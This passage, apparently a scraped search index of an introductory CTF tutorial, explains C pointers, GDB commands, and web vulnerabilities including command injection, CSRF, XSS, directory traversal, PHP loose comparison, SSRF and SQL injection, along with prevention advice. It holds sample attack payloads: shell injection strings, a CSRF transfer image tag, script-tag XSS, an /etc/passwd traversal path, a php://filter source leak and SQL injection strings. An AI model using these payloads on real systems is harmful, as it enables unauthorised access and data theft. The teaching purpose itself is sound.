The y variable will store the address of the x variable (0x1000).
Note
The * character allows us to declare pointer variables but also allows us to access the value stored at a pointer. For example, entering *y allows us to access the 4 value instead of 0x1000.
Whenever we use the y variable we are using the memory address, but if we use the x variable we use the value stored at the memory address.
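The same relationship between a value and its address can be explored from Python using the standard ctypes module, which exposes C-style integers and pointers. This is only an illustrative sketch: the address printed will differ on every run and will not be 0x1000.

```python
import ctypes

x = ctypes.c_int(4)    # like: int x = 4;
y = ctypes.pointer(x)  # like: int* y = &x;

address_of_x = ctypes.addressof(x)    # the address stored in y
value_via_pointer = y.contents.value  # like: *y

print(hex(address_of_x))
print(value_via_pointer)

# Writing through the pointer changes x itself, like: *y = 10;
y[0] = 10
print(x.value)
```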
Arrays are a grouping of objects of the same type. They are typically created with the following syntax:
type arrayName [ arraySize ];\n
To initialize values in the array we can do:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n
Arrays allow programmers to group data into logical containers.
To access the individual elements of an array we access the contents by their \"index\". Most programming languages today start counting from 0. So to take our previous example:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n/* indexes 0 1 2 3 4 5 6 7 8 9 */\n
To access the value 6 we would use index 5:
integers[5];\n
"}, {"location": "reverse-engineering/what-is-c/#how-do-arrays-work", "title": "How do arrays work?", "text": "Arrays are a clever combination of multiplication, pointers, and programming.
Because the computer knows the data type used for every element in the array, the computer needs to simply multiply the size of the data type by the index you are looking for and then add this value to the address of the beginning of the array.
For example if we know that the base address of an array is 1000 and we know that each integer takes 8 bytes, we know that if we have 8 integers right next to each other, we can get the integer at the 4th index with the following math:
1000 + (4 * 8) = 1032\n
array [ 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ]\nindex 0 1 2 3 4 5 6 7\naddrs 1000 1008 1016 1024 1032 1040 1048 1056\n
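The address calculation above can be written as a one-line function. This is a small Python sketch using the same assumed numbers as the example (base address 1000, 8 bytes per element); the function name element_address is made up for illustration.

```python
def element_address(base: int, index: int, element_size: int) -> int:
    """Address of array[index] given the base address and element size."""
    return base + index * element_size


# Recreate the "addrs" row of the table for an 8-element array.
addresses = [element_address(1000, i, 8) for i in range(8)]
print(addresses)
print(element_address(1000, 4, 8))  # 1032
```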
"}, {"location": "reverse-engineering/what-is-c/#memory-management", "title": "Memory Management", "text": ""}, {"location": "reverse-engineering/what-is-gdb/", "title": "The GNU Debugger (GDB)", "text": "The GNU Debugger or GDB is a powerful debugger which allows for step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.
"}, {"location": "reverse-engineering/what-is-gdb/#vanilla-gdb", "title": "Vanilla GDB", "text": "GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndbg solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.
"}, {"location": "reverse-engineering/what-is-gdb/#starting-gdb", "title": "Starting GDB", "text": "To execute GDB and attach it to a program simply run gdb [program]
(gdb) disassemble [address/symbol]
will display the disassembly for that function/frame
GDB will autocomplete functions, so saying (gdb) disas main
suffices if you'd like to see the disassembly of main
Another handy thing to see while stepping through a program is the disassembly of nearby instructions:
(gdb) display/[# of instructions]i $pc [\u00b1 offset]
display shows data with each step
/[#]i shows how much data in the format i for instruction
$pc means the pc, program counter, register
[\u00b1 offset] allows you to specify how you would like the data offset from the current instruction
(gdb) display/10i $pc - 0x5
This command will show 10 instructions on screen with an offset from the next instruction of 5, giving us this display:
0x8048535 <main+6>: lock pushl -0x4(%ecx)\n 0x8048539 <main+10>: push %ebp\n=> 0x804853a <main+11>: mov %esp,%ebp\n 0x804853c <main+13>: push %ecx\n 0x804853d <main+14>: sub $0x14,%esp\n 0x8048540 <main+17>: sub $0xc,%esp\n 0x8048543 <main+20>: push $0x400\n 0x8048548 <main+25>: call 0x80483a0 <malloc@plt>\n 0x804854d <main+30>: add $0x10,%esp\n 0x8048550 <main+33>: sub $0xc,%esp\n
"}, {"location": "reverse-engineering/what-is-gdb/#deleting-views", "title": "Deleting Views", "text": "If, for whatever reason, a view no longer suits your needs, simply call (gdb) info display
which will give you a list of active displays:
Auto-display expressions now in effect:\nNum Enb Expression\n1: y /10bi $pc-0x5\n
Then simply execute (gdb) delete display 1
and your execution will resume without the display.
In order to view the state of registers with vanilla gdb, you need to run the command info registers
which will display the state of all the registers:
eax 0xf77a6ddc -142971428\necx 0xffe06b10 -2069744\nedx 0xffe06b34 -2069708\nebx 0x0 0\nesp 0xffe06af8 0xffe06af8\nebp 0x0 0x0\nesi 0xf77a5000 -142979072\nedi 0xf77a5000 -142979072\neip 0x804853a 0x804853a <main+11>\neflags 0x286 [ PF SF IF ]\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x63 99\n
If you simply would like to see the contents of a single register, use the notation p/x $[register] where:
p/x means print the value in hex notation
$[register] is the register code such as eax, rax, etc.
These commands work with vanilla gdb as well.
"}, {"location": "reverse-engineering/what-is-gdb/#setting-breakpoints", "title": "Setting Breakpoints", "text": "Setting breakpoints in GDB uses the format b*[Address/Symbol]
(gdb) b*main: Break at the start of main
(gdb) b*0x804854d: Break at 0x804854d
(gdb) b*0x804854d-0x100: Break at 0x804844d
As before, in order to delete a breakpoint, you can list the available breakpoints using (gdb) info breakpoints
(don't forget about GDB's autocomplete, you don't always need to type out every command!) which will display all breakpoints:
Num Type Disp Enb Address What\n1 breakpoint keep y 0x0804852f <main>\n3 breakpoint keep y 0x0804864d <__libc_csu_init+61>\n
Then simply execute (gdb) delete 1
Note
GDB creates breakpoints chronologically and does NOT reuse numbers.
"}, {"location": "reverse-engineering/what-is-gdb/#stepping", "title": "Stepping", "text": "What good is a debugger if you can't control where you are going? In order to begin execution of a program, use the command r [arguments]
similar to how if you ran it with dot-slash notation you would execute it ./program [arguments]
. If no breakpoints are set, the program will run normally. If you have breakpoints set, execution will stop at the first breakpoint it reaches.
(gdb) continue [# of breakpoints]: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthand c)
(gdb) step [# of steps]: Steps forward the specified number of times, entering any called functions; default is 1 (shorthand s). Use stepi (shorthand si) to step by single machine instructions
(gdb) nexti [# of instructions]: Steps over an instruction, meaning it will not delve into called functions (shorthand ni)
(gdb) finish: Finishes a function and breaks after it returns (shorthand fin)
Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.
(gdb) x/[#][size][format] [Address/Symbol/Register][\u00b1 offset]
x/ means examine
[#] means how much
[size] means what size the data should be such as a byte b (1 byte), halfword h (2 bytes), word w (4 bytes), or giant word g (8 bytes)
[format] means how the data should be interpreted such as an instruction i, a string s, hex bytes x
[Address/Symbol][\u00b1 offset] means where to start interpreting the data
(gdb) x/x $rax: Displays the memory at the address held in RAX as hex (use p/x $rax to print the register value itself)
(gdb) x/i 0xdeadbeef: Displays the instruction at address 0xdeadbeef
(gdb) x/10s 0x893e10: Displays 10 strings at the address
(gdb) x/10gx 0x7fe10: Displays 10 giant words as hex at the address
If the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. In order to specify which process gdb should follow after a fork, you can use the command set follow-fork-mode [parent/child]
If you would like to set data at any point, it is possible using the command set [Register]=[Hex Data] or set {type}[Address]=[Hex Data]
set $rax=0x0: Sets the register rax to 0
set {int}0x1e4a70=0x123: Sets the int at 0x1e4a70 to 0x123
A handy way to find the process's mapped address spaces is to use info proc map:
Mapped address spaces:\n\n Start Addr End Addr Size Offset objfile\n 0x8048000 0x8049000 0x1000 0x0 /directory/program\n 0x8049000 0x804a000 0x1000 0x0 /directory/program\n 0x804a000 0x804b000 0x1000 0x1000 /directory/program\n 0xf75cb000 0xf75cc000 0x1000 0x0\n 0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so\n 0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so\n 0xf777b000 0xf777c000 0x1000 0x1ae000 /lib32/libc-2.23.so\n 0xf777c000 0xf7780000 0x4000 0x0\n 0xf778b000 0xf778d000 0x2000 0x0 [vvar]\n 0xf778d000 0xf778f000 0x2000 0x0 [vdso]\n 0xf778f000 0xf77b1000 0x22000 0x0 /lib32/ld-2.23.so\n 0xf77b1000 0xf77b2000 0x1000 0x0\n 0xf77b2000 0xf77b3000 0x1000 0x22000 /lib32/ld-2.23.so\n 0xf77b3000 0xf77b4000 0x1000 0x23000 /lib32/ld-2.23.so\n 0xffc59000 0xffc7a000 0x21000 0x0 [stack]\n
This will show you where the stack, heap (if there is one), and libc are located.
"}, {"location": "reverse-engineering/what-is-gdb/#attaching-processes", "title": "Attaching Processes", "text": "Another useful feature of GDB is to attach to processes which are already running. Simply launch gdb using gdb
, then find the process id of the program you would like to attach to and execute attach [pid]
.
Websites all around the world are programmed using various programming languages. While there are specific vulnerabilities in each programming language that the developer should be aware of, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.
These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher level privilege.
Common vulnerabilities to see in CTF challenges:
Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system()
command or its equivalent in the programming language of the application.
import os\n\ndomain = user_input() # ctf101.org\n\nos.system('ping ' + domain)\n
The above code when used normally will ping the ctf101.org
domain.
But consider what would happen if the user_input()
function returned different data?
import os\n\ndomain = user_input() # ; ls\n\nos.system('ping ' + domain)\n
Because of the additional semicolon, the os.system()
function is instructed to run two commands.
It looks to the program as:
ping ; ls\n
Note
The semicolon terminates a command in bash and allows you to put another command after it.
Because the ping
command is being terminated and the ls
command is being added on, the ls
command will be run in addition to the empty ping command!
This is the core concept behind command injection. The ls
command could of course be switched with another command (e.g. wget, curl, bash, etc.)
Command injection is a very common means of privilege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
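To see why string concatenation is the root of the problem, it helps to compare how a shell would split the command with and without quoting. The following is a minimal sketch using Python's standard shlex module; the helper names build_unsafe, build_quoted and build_argv are invented for this example, and nothing is actually executed.

```python
import shlex


def build_unsafe(domain: str) -> str:
    # Same pattern as the vulnerable example: raw concatenation.
    return "ping " + domain


def build_quoted(domain: str) -> str:
    # shlex.quote wraps the input so the shell treats it as one argument.
    return "ping " + shlex.quote(domain)


def build_argv(domain: str) -> list:
    # An argument list like this could be handed to subprocess.run()
    # without shell=True, so no shell ever parses the input.
    return ["ping", domain]


payload = "; ls"
print(build_unsafe(payload))               # ping ; ls
print(shlex.split(build_unsafe(payload)))  # the ';' becomes its own token
print(build_quoted(payload))
print(shlex.split(build_quoted(payload)))  # payload stays a single argument
print(build_argv(payload))
```

In the quoted and argument-list versions the payload reaches ping as a (nonsensical) hostname instead of being interpreted as a second command.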
"}, {"location": "web-exploitation/command-injection/what-is-command-injection/#example-payloads", "title": "Example Payloads", "text": ";ls
$(ls)
`ls`
A Cross Site Request Forgery or CSRF Attack, pronounced see surf, is an attack on an authenticated user which uses a state session in order to perform state changing attacks like a purchase, a transfer of funds, or a change of email address.
The entire premise of CSRF is based on session hijacking, usually by injecting malicious elements within a webpage through an <img>
tag or an <iframe>
where references to external resources are unverified.
GET
requests are often used by websites to get user input. Say a user signs in to a banking site which assigns their browser a cookie which keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:
http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]
Knowing this format, an attacker can send an email with a hyperlink to be clicked on or they can include an image tag of 0 by 0 pixels which will automatically be requested by the browser such as:
<img src=\"http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]\" width=\"0\" height=\"0\" border=\"0\">
Cross Site Scripting or XSS is a vulnerability where one user of an application can send JavaScript that is executed by the browser of another user of the same application.
This is a vulnerability because JavaScript has a high degree of control over a user's web browser.
For example JavaScript has the ability to:
By combining all of these abilities, XSS can maliciously use JavaScript to extract user's cookies and send them to an attacker controlled server. XSS can also modify the DOM to phish users for their passwords. This only scratches the surface of what XSS can be used to do.
XSS is typically broken down into three categories:
Reflected XSS is when an XSS exploit is provided through a URL parameter.
For example:
https://ctf101.org?data=<script>alert(1)</script>\n
You can see the XSS exploit provided in the data
GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.
For example:
<html>\n <body>\n <script>alert(1)</script>\n </body>\n</html>\n
Depending on where the exploit gets injected, it may need to be constructed differently.
Also, the exploit payload can change to fit whatever the attacker needs it to do. Whether that is to extract cookies and submit it to an external server, or to simply modify the page to deface it.
One of the deficiencies of reflected XSS however is that it requires the victim to access the vulnerable page from an attacker controlled resource. Notice that if the data parameter wasn't provided, the exploit wouldn't work.
In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicious XSS payloads in URLs.
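The difference between a vulnerable and a non-vulnerable reflection can be sketched in a few lines. This Python example is a simplified stand-in for a server-side template, not the code of any real framework; TEMPLATE, render_unsafe and render_escaped are hypothetical names, and html.escape is the standard library helper for encoding HTML special characters.

```python
import html

# A toy page template with one slot for the "data" GET parameter.
TEMPLATE = "<html>\n  <body>\n    {data}\n  </body>\n</html>"


def render_unsafe(data: str) -> str:
    # Reflects the parameter verbatim, so markup in it becomes part of the DOM.
    return TEMPLATE.format(data=data)


def render_escaped(data: str) -> str:
    # Encodes <, >, & and quotes so the browser shows the text instead of running it.
    return TEMPLATE.format(data=html.escape(data))


payload = "<script>alert(1)</script>"
print(render_unsafe(payload))
print(render_escaped(payload))
```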
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#stored-xss", "title": "Stored XSS", "text": "Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.
Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.
The reason being that the web site itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#dom-xss", "title": "DOM XSS", "text": "DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.
The server itself is not to blame, but the client side JavaScript files are causing the issue.
"}, {"location": "web-exploitation/directory-traversal/what-is-directory-traversal/", "title": "Directory Traversal", "text": "Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.
Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.
For example, consider an application that allows the user to choose what page to load from a GET parameter.
<?php\n $page = $_GET['page']; // index.php\n include(\"/var/www/html/\" . $page);\n?>\n
Under normal operation the page would be index.php. But what if a malicious user supplied something different?
<?php\n $page = $_GET['page']; // ../../../../../../../../etc/passwd\n include(\"/var/www/html/\" . $page);\n?>\n
Here the user is submitting ../../../../../../../../etc/passwd.
This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead being forced up to the root folder.
include(\"/var/www/html/../../../../../../../../etc/passwd\");\n
Ultimately this will become /etc/passwd because a path cannot go above the top-level (root) directory; extra ../ segments are simply ignored.
Thus the application will load the /etc/passwd file and emit it to the user like so:
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\n_apt:x:104:65534::/nonexistent:/bin/false\n
This same concept applies to any application that takes input from a user and then uses it to access a file or path. This vulnerability can often be used to leak sensitive data or extract application source code to find other vulnerabilities.
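The path collapsing described above can be sketched in Python. This is a minimal illustration, not the PHP interpreter's actual logic: `resolve` and `is_inside_base` are hypothetical helpers, and `posixpath.normpath` only normalizes the string (it does not follow symlinks, which a real check would also need to handle).

```python
import posixpath

BASE_DIR = '/var/www/html'  # directory used in the example above


def resolve(page):
    # Join the user-supplied value onto the base directory and collapse
    # the '..' segments the way the filesystem would.
    return posixpath.normpath(posixpath.join(BASE_DIR, page))


def is_inside_base(page):
    # Hypothetical containment check: accept only paths that still
    # live under BASE_DIR after normalization.
    resolved = resolve(page)
    return posixpath.commonpath([BASE_DIR, resolved]) == BASE_DIR


print(resolve('index.php'))
print(resolve('../../../../../../../../etc/passwd'))  # /etc/passwd
print(is_inside_base('index.php'))                    # True
print(is_inside_base('../../../../../../../../etc/passwd'))  # False
```

Checking the normalized result, rather than searching the raw input for `../`, is the design choice here: it also rejects absolute paths and encodings that collapse to a location outside the base directory.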
"}, {"location": "web-exploitation/php/what-is-php/", "title": "PHP", "text": "PHP is one of the most widely used languages for back-end web development, and it has therefore become a frequent target for hackers. PHP makes it painful to write secure code in many situations, making it every hacker's dream target.
"}, {"location": "web-exploitation/php/what-is-php/#overview", "title": "Overview", "text": "PHP is a C-like language which uses tags enclosed by <?php ... ?>
(sometimes just <? ... ?>). It is inlined into HTML. A word of advice: keep the PHP docs open, because function names are inconsistent. In early versions of PHP, the length of a function's name was used as the key in PHP's internal dictionary, so function names were shortened or lengthened to make the lookup faster. Other things include:
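$name (variables are prefixed with $)
$$name (variable variables: the value of $name is used as a variable name)
$_GET, $_POST, $_SERVER (request-specific superglobal arrays)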
<?php\n if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['email']) && isset($_POST['password'])) {\n $db = new mysqli('127.0.0.1', 'cs3284', 'cs3284', 'logmein');\n $email = $_POST['email'];\n $password = sha1($_POST['password']);\n $res = $db->query(\"SELECT * FROM users WHERE email = '$email' AND password = '$password'\");\n if ($row = $res->fetch_assoc()) {\n $_SESSION['id'] = $row['id'];\n header('Location: index.php');\n die();\n }\n }\n?>\n<html>...\n
This example PHP simply checks the POST data for an email and password. If a row with that email and the SHA-1 hash of the password exists in the database, the user is logged in and redirected to the index page.
The line email = '$email' uses automatic string interpolation to insert the value of $email into the query string that is sent to the database.
PHP will do just about anything to make a loose comparison (==) match, which means things can be 'equal' (==) or really equal (===). The implicit conversion between strings and integers is the root cause of a lot of issues in PHP.
"}, {"location": "web-exploitation/php/what-is-php/#type-comparison-table", "title": "Type Comparison Table", "text": ""}, {"location": "web-exploitation/php/what-is-php/#comparisons-of-x-with-php-functions", "title": "Comparisons of $x with PHP Functions", "text": "Expression gettype() empty() is_null() isset() boolean:if($x)
$x = \"\"; string TRUE FALSE TRUE FALSE $x = null; NULL TRUE TRUE FALSE FALSE var $x; NULL TRUE TRUE FALSE FALSE $x is undefined NULL TRUE TRUE FALSE FALSE $x = array(); array TRUE FALSE TRUE FALSE $x = array('a', 'b'); array FALSE FALSE TRUE TRUE $x = false; boolean TRUE FALSE TRUE FALSE $x = true; boolean FALSE FALSE TRUE TRUE $x = 1; integer FALSE FALSE TRUE TRUE $x = 42; integer FALSE FALSE TRUE TRUE $x = 0; integer TRUE FALSE TRUE FALSE $x = -1; integer FALSE FALSE TRUE TRUE $x = \"1\"; string FALSE FALSE TRUE TRUE $x = \"0\"; string TRUE FALSE TRUE FALSE $x = \"-1\"; string FALSE FALSE TRUE TRUE $x = \"php\"; string FALSE FALSE TRUE TRUE $x = \"true\"; string FALSE FALSE TRUE TRUE $x = \"false\"; string FALSE FALSE TRUE TRUE"}, {"location": "web-exploitation/php/what-is-php/#comparisons", "title": "\"==\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== 1 ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== -1 ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE \"1\" ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE ==TRUE== array() FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE FALSE \"php\" ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE=="}, {"location": 
"web-exploitation/php/what-is-php/#comparisons_1", "title": "\"===\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 1 FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE -1 FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE \"1\" FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE array() FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE \"php\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE=="}, {"location": "web-exploitation/php/what-is-php/#file-inclusion", "title": "File Inclusion", "text": "PHP has multiple ways to include other source files such as require, require_once and include. These can take a dynamic string such as require $_GET['page'] . \".php\";
which is usually seen in templating.
PHP has its own URL scheme, php://..., and one of its main uses is to filter data automatically. It can automatically remove certain HTML tags and can base64 encode as well.
$fp = fopen('php://output', 'w');\nstream_filter_append(\n $fp,\n 'string.strip_tags',\n STREAM_FILTER_WRITE,\n array('b','i','u'));\nfwrite($fp, \"<b>bolded text</b> enlarged to a <h1>level 1 heading</h1>\\n\");\n/* <b>bolded text</b> enlarged to a level 1 heading */\n
"}, {"location": "web-exploitation/php/what-is-php/#exploitation", "title": "Exploitation", "text": "These filters can also be used on input such as:
php://filter/convert.base64-encode/resource={file}
include, file_get_contents(), etc. support URLs, including PHP stream filter URLs (php://).
include normally evaluates any PHP code (in tags) it finds, but if the file is base64 encoded first, the code is not executed and the encoded output can be used to leak source.
Server Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.
For example, say there is a website that lets you take a screenshot of any site on the internet.
Under normal usage a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost ? Or perhaps tried to access something more useful like http://localhost/server-status ?
Note
127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.
Depending on the response from the site, the attacker may be able to gain additional information about what's running on the computer itself.
In addition, requests originating from the server come from the server's IP, not the attacker's IP. Because of that, the attacker might be able to reach internal resources that they wouldn't normally be able to access.
Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.
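To make the localhost concern concrete, here is a minimal Python sketch of the kind of check a screenshot service might run before fetching a user-supplied URL. The function name `is_internal_target` is hypothetical, and the check is deliberately incomplete: it only inspects literal IP addresses and the name `localhost`, so a hostname that resolves to an internal address, or a redirect to one, would still get through.

```python
import ipaddress
from urllib.parse import urlparse


def is_internal_target(url):
    # Extract the host part of the URL the user asked us to fetch.
    host = urlparse(url).hostname
    if host is None:
        return True  # treat anything unparseable as unsafe
    if host == 'localhost':
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not a literal IP address. A real check would resolve the name
        # and test every resulting address; this sketch does not.
        return False
    return addr.is_loopback or addr.is_private or addr.is_link_local


print(is_internal_target('http://localhost/server-status'))  # True
print(is_internal_target('http://127.0.0.1:8080/'))          # True
print(is_internal_target('http://10.0.0.5/'))                # True
print(is_internal_target('https://www.google.com/'))         # False
```

From the attacker's side, the same idea in reverse is what turns SSRF into a port scanner: each internal address and port is requested through the vulnerable site and the responses are compared.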
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/", "title": "SQL Injection", "text": "SQL Injection is a vulnerability where an application takes input from a user and doesn't validate that the user's input doesn't contain additional SQL.
<?php\n $username = $_GET['username']; // kchung\n $result = mysql_query(\"SELECT * FROM users WHERE username='$username'\");\n?>\n
If we look at the $username variable, under normal operation we might expect the username parameter to be a real username (e.g. kchung).
But a malicious user might submit a different kind of data. For example, consider what happens if the input was '?
The query would fail, and the application might crash, because the resulting SQL is syntactically invalid.
SELECT * FROM users WHERE username='''\n
Note
Notice the extra single quote at the end.
With the knowledge that a single quote will cause an error in the application we can expand a little more on SQL Injection.
What if our input was ' OR '1'='1?
SELECT * FROM users WHERE username='' OR '1'='1'\n
The string '1' is indeed equal to '1'. This equates to true in SQL. If we reinterpret this, the SQL statement is really saying
SELECT * FROM users WHERE username='' OR true\n
This will return every row in the table because the WHERE condition evaluates to true for every row.
We can also inject comments and termination characters like --, /*, or ;. This allows you to terminate SQL queries after your injected statements. For example, '-- is a common SQL injection payload.
SELECT * FROM users WHERE username=''-- '\n
This payload closes the string with a single quote, leaving the username as an empty string, and then adds a comment (--) that effectively hides the second single quote.
Using this technique of adding SQL statements to an existing query, we can force databases to return data that they were not meant to return.
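The behavior described above can be reproduced safely with an in-memory SQLite database. This Python sketch is only an illustration under assumptions: the table contents, the `find_user_unsafe` helper, and the use of SQLite instead of MySQL are all made up for the demo. It builds the query by string concatenation, as the vulnerable PHP does, and combines the OR condition with a trailing comment.

```python
import sqlite3

QUOTE = chr(39)  # a single quote character

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE users (username TEXT, password TEXT)')
conn.executemany('INSERT INTO users VALUES (?, ?)',
                 [('kchung', 'hash1'), ('admin', 'hash2')])


def find_user_unsafe(username):
    # Vulnerable on purpose: user input is pasted into the SQL text.
    query = ('SELECT username FROM users WHERE username='
             + QUOTE + username + QUOTE)
    return conn.execute(query).fetchall()


print(find_user_unsafe('kchung'))                    # one matching row
print(find_user_unsafe(QUOTE + ' OR 1=1-- '))        # every row in the table

try:
    find_user_unsafe(QUOTE)                          # a lone single quote
except sqlite3.OperationalError as err:
    print('query failed:', err)
```

The lone quote produces a syntax error, while the second payload turns the WHERE clause into a condition that is true for every row.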
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/#preventing-sql-injection", "title": "Preventing SQL Injection", "text": "The best way to prevent SQL Injection is to use prepared statements. Prepared statements are a way to execute SQL queries that separates the query logic from the data being passed into the query.
<?php\n $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');\n $stmt->execute(['username' => $username]);\n?>\n
In this example, :username is a placeholder that is bound to the value of the $username variable. The database driver sends the value separately from the query text (or escapes it when prepared statements are emulated), so it is treated as data and never as SQL.
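The same idea can be sketched in Python with the standard `sqlite3` module, which uses `?` as its placeholder. The table, its rows, and the `find_user` helper are assumptions made for this demo rather than part of the PHP example.

```python
import sqlite3

QUOTE = chr(39)  # a single quote character

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE users (username TEXT)')
conn.executemany('INSERT INTO users VALUES (?)', [('kchung',), ('admin',)])


def find_user(username):
    # The value is bound to the ? placeholder by the driver, so it is
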